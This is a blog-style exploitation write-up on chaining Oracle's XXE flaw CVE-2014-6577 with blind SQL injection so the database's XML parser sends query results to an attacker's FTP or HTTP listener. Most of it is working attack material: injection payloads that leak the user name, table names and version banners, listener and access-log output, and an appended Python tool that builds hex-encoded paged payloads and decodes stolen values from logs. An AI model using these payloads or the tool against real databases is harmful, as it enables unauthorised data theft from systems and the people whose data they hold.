Crackershi · 2015/05/12 16:24

0x00 Preface


You are probably familiar with both SQL injection and XML external entity injection (XXE). This article discusses a way to pull data out of a target remotely when all you have is an Oracle blind injection. The effect is similar to the UTL_HTTP out-of-band technique, but the mechanism behind it is different: the request is made by the database's XML parser, not by a PL/SQL network package.

0x01 Brief Vulnerability Analysis


CVE-2014-6577, which Oracle patched earlier this year (January 2015 Critical Patch Update), is an XXE vulnerability in the database's XML parser. The known affected versions are:

11.2.0.3, 11.2.0.4, 12.1.0.1 and 12.1.0.2; releases that Oracle no longer supports may well be affected too. By constructing a SQL statement, an attacker can make the XML parser send an HTTP or FTP request, which enables at least the following:

  • Data exfiltration
  • SSRF
  • Port scanning
  • Denial of service

And so on…

0x02 Exploitation


The PoC given in the reference works as follows:

On the attacker's host, listen on port 21 with nc. When the connection arrives, type 220 (the FTP greeting) so that the client proceeds to send USER and PASS.

select extractvalue(xmltype('<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://'||user||':bar@11.11.11.11/test"> %remote; %param1;]>'),'/l') from dual;

and

# busybox nc -vvlp 21
listening on [::]:21 ...
connect to [::ffff:11.11.11.11]:21 from [::ffff:22.22.22.22]:37040 ([::ffff:22.22.22.22]:37040)
220
USER XXXX_WEB_XXXX
220
PASS bar
^C sent 8, rcvd 33
punt!

The database user name arrives in the FTP USER command. When the connection is dropped, Oracle reports the following error:

ORA-31000: Resource 'ftp://XXXX_WEB_XXXX:bar@11.11.11.11
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
…………

Next, change the PoC so that the parser makes an HTTP request instead of an FTP request, with the data placed in the URL path:

select extractvalue(xmltype('<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://11.11.11.11/'||user||'"> %remote; %param1;]>'),'/l') from dual;

Now there is no need to run nc or an FTP server at all: the request simply shows up in the web server's access log. A 404 is fine, since the parser has already sent the data by the time the response comes back.

22.22.22.22 - - [27/Apr/2015:07:56:53 -0400] "GET /XXXX_WEB_XXXX HTTP/1.0" 404 294 "-" "-"

0x03 Exploitation in Practice


A search function on the target has a SQL injection vulnerability.

A probe such as the following confirms that it is blind injection, and the backend can be identified as Oracle (the dual table alone is not conclusive, since MySQL accepts it too, but the rest of the behaviour fits Oracle):

XXX%' and 1=(select 1 from dual) and '%'='

Plug the XXE payload into the injection point. ROWNUM is assigned in the inner query so that exactly one row of USER_TABLES is selected per request; incrementing R pages through the table:

XXX%' and 1=(select extractvalue(xmltype('<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://11.11.11.11/'||(SELECT TABLE_NAME FROM (SELECT ROWNUM AS R,TABLE_NAME FROM USER_TABLES) WHERE R=1)||'"> %remote; %param1;]>'),'/l') from dual) and '%'='

The listening web server receives the first table name in the request path:

"GET /EC_COMP_BINARY_INFO HTTP/1.0" 404 297 "-"

Several results can also be returned in a single request by concatenating them with a separator (here ////). The server then receives:

22.22.22.22 - - [27/Apr/2015:23:12:01 -0400] "GET /EC_COMP_BINARY_INFO////EC_COMP_BINARY_MAPPING HTTP/1.0" 404 323 "-" "-"

Results that contain whitespace or other special characters are a problem: Oracle does not URL-encode the value when it builds the request, so a space breaks the HTTP request line and a slash is taken as a path separator. Use Oracle's utl_raw.cast_to_raw() to convert each result to hex first; a RAW value renders as uppercase hex when it is concatenated into the string:

XXX%' and 1=(select extractvalue(xmltype('<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://11.11.11.11/'||(SELECT utl_raw.cast_to_raw(BANNER) FROM (SELECT ROWNUM AS R,BANNER FROM v$version) WHERE R=1)||'////'||(SELECT utl_raw.cast_to_raw(BANNER) FROM (SELECT ROWNUM AS R,BANNER FROM v$version) WHERE R=2)||'"> %remote; %param1;]>'),'/l') from dual) and '%'='

Request received:

[28/Apr/2015:03:50:16 -0400] "GET /4F7261636C652044617461626173652031316720456E74657270726973652045646974696F6E2052656C656173652031312E322E302E322E30202D2036346269742050726F64756374696F6E////504C2F53514C2052656C656173652031312E322E302E322E30202D2050726F64756374696F6E HTTP/1.0" 404 510 "-" "-"

Hex-decoding the two path segments gives:

Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
PL/SQL Release 11.2.0.2.0 - Production

Note that this target runs 11.2.0.2.0, which is not in Oracle's list of affected versions; that bears out the earlier remark that unsupported releases can be vulnerable as well.
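As an added example (not code from the original article or the advisory it cites), the following Python helper builds the hex-encoded, ROWNUM-paged payload from 0x03 for an arbitrary column, table and row, and decodes the resulting access-log lines back into values. It covers both the plain TABLE_NAME path from the first request and the hex path from the v$version request. It assumes the article's injection shape (XXX%' ... and '%'=') and the listener 11.11.11.11; the sample log lines are constructed from the request paths shown above.

```python
"""Helpers for the Oracle XXE out-of-band channel described above.

Added example, not code from the original article. Assumes the article's
injection shape (the value closes with %' and the tail ' and '%'=' ), the
article's listener 11.11.11.11, and a combined-format access log on the
listener. The sample log lines below are constructed from the request
paths shown in the article.
"""
import re

ATTACKER_HOST = "11.11.11.11"   # listener host from the article
SEP = "////"                    # separator the article uses between values


def hex_subquery(column, table, row):
    """Subquery returning row `row` (1-based) of `column` from `table`,
    hex-encoded with utl_raw.cast_to_raw() so that spaces, slashes and
    other URL-unsafe characters cannot break the request line.
    ROWNUM is assigned in the inner query, so one row is selected per
    request and the caller pages through the table by incrementing `row`."""
    return (f"(SELECT utl_raw.cast_to_raw({column}) FROM "
            f"(SELECT ROWNUM AS R,{column} FROM {table}) WHERE R={row})")


def build_payload(subqueries, host=ATTACKER_HOST):
    """Assemble the injection string. The subqueries are concatenated into
    the SYSTEM identifier of a parameter entity; resolving %remote; makes the
    XML parser fetch http://host/<v1>////<v2>... and the data leaves in the
    request path. The extractvalue() result is only compared with 1 so the
    expression is a valid boolean inside the blind injection."""
    url_expr = "'||" + f"||'{SEP}'||".join(subqueries) + "||'"
    dtd = ('<?xml version="1.0" encoding="utf-8"?>'
           '<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://' + host + '/'
           + url_expr + '"> %remote; %param1;]>')
    return ("XXX%' and 1=(select extractvalue(xmltype('" + dtd
            + "'),'/l') from dual) and '%'='")


_REQUEST = re.compile(r'"GET /([^ ]*) HTTP/1\.[01]"')
_HEX = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")


def decode_request(log_line):
    """Recover the exfiltrated values from one access-log line.
    Each ////-separated path segment is hex-decoded if it is pure hex
    (the utl_raw variant); otherwise it is returned unchanged (the plain
    TABLE_NAME variant). Returns None if the line holds no GET request."""
    m = _REQUEST.search(log_line)
    if not m:
        return None
    values = []
    for seg in m.group(1).split(SEP):
        if _HEX.match(seg):
            # The database character set is not known; keep going on bad bytes.
            values.append(bytes.fromhex(seg).decode("utf-8", errors="replace"))
        else:
            values.append(seg)
    return values


# Constructed sample lines, built from the request paths shown in the article.
SAMPLE_PLAIN = ('22.22.22.22 - - [27/Apr/2015:23:12:01 -0400] '
                '"GET /EC_COMP_BINARY_INFO////EC_COMP_BINARY_MAPPING HTTP/1.0" 404 323 "-" "-"')
SAMPLE_HEX = ('22.22.22.22 - - [28/Apr/2015:03:50:16 -0400] "GET /'
              '4F7261636C652044617461626173652031316720456E74657270726973652045646974696F6E'
              '2052656C656173652031312E322E302E322E30202D2036346269742050726F64756374696F6E'
              '////504C2F53514C2052656C656173652031312E322E302E322E30202D2050726F64756374696F6E'
              ' HTTP/1.0" 404 510 "-" "-"')

if __name__ == "__main__":
    print(build_payload([hex_subquery("BANNER", "v$version", 1),
                         hex_subquery("BANNER", "v$version", 2)]))
    for line in (SAMPLE_PLAIN, SAMPLE_HEX):
        print(decode_request(line))
```

Run the file directly to print the v$version payload and the decoded sample lines. The hex encoding is what keeps spaces and slashes from corrupting the request path; the per-row ROWNUM paging is what keeps the injected statement itself short, which matters when the search parameter has a length limit.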

References:


https://blog.netspi.com/advisory-xxe-injection-oracle-database-cve-2014-6577/